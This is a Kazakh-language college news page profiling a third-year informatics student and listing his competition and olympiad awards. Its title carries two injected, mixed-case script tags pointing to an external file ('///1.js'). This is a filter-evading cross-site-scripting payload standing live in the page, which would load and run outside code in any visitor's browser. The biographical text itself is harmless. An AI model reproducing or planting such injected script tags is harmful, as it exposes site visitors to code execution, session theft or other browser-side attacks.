«ҚР КОЛЛЕДЖДЕРІНІҢ ЕҢ ҮЗДІК 100 СТУДЕНТІ». АЛЬКЕНОВ ДАНЕКЕР АМАНГЕЛЬДЫҰЛЫ<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

29.09.2021

Алькенов Данекер Амангельдыұлы – Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің информатика бөлімінің III курс студенті. Ол білікті ұстаз болып, ұлы мамандықтың  шыңына шығуды мақсат тұтады.

Бүгінде Данекер колледж қабырғасында жүріп-ақ бірталай жетістіктерді бағындырып үлгерді. Мысалы, «KAZRIO.KZ – жас өркен» – білім мен қабілетті дамыту орталығының  қашықтан өткізілетін Республикалық экспресс байқауы мен «Менің бақытты балалығым» сайысында жүлделі 1 дәрежелі дипломмен марапатталды. Сонымен қатар жалпы орта, қосымша, техникалық және кәсіптік білім беру ұйымдарының білім алушылары арасында «Рухани жаңғыру» бағдарламасын іске асыру  шеңберінде өткен  «Ата Заңым – тұғырым» атты білім бәйгесінде де жеңімпаз атанды. Ол физика пәні бойынша өткен II Республикалық пән олимпиадасының 1 дәрежелі дипломын иеленді.  Сондай-ақ «Ақпараттық инновациялық технологияның заманауи үлгісін жан-жақты меңгеріп, өзінің ғылыми потенциялын таныта білгені үшін «IT  intellekt – 2020» номинациясымен марапатталған.

https://www.instagram.com/p/CUEhiCNM2W9/?utm_medium=share_sheet

Просмотров: 548


Пікір қосу



Деректерді қолтаңбаға қосу